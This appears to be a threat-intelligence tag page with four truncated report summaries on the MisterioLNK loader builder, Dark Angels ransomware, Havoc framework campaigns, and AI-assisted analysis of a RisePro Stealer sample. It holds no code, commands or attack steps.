Tag: 2024-10-08

MisterioLNK is a newly discovered open-source loader builder that generates LNK, BAT, CMD, and VBS loader files designed to download and execute remote files. Available on GitHub, it poses a significant challenge to security defenses due to minimal detection rates. The tool supports multiple loader…

The Dark Angels ransomware group, active since April 2022, operates with sophisticated strategies targeting large companies for substantial ransom demands. They focus on stealthy attacks, avoiding outsourcing to third-party brokers. The group uses various ransomware payloads, including Babuk and Re…

Recent research reveals adversaries increasingly using the Havoc post-exploitation framework to bypass cybersecurity systems. Two campaigns utilizing this framework were analyzed. The first campaign involved phishing emails with malicious archives containing ISO files and LNK files, which downloade…

This analysis explores the application of Generative AI, specifically Google's Gemini Advanced, in malware analysis. The experiment focuses on analyzing executable files, particularly a RisePro Stealer sample. The methodology involves decompiling the malware using Ghidra and IDA Pro, then using spe…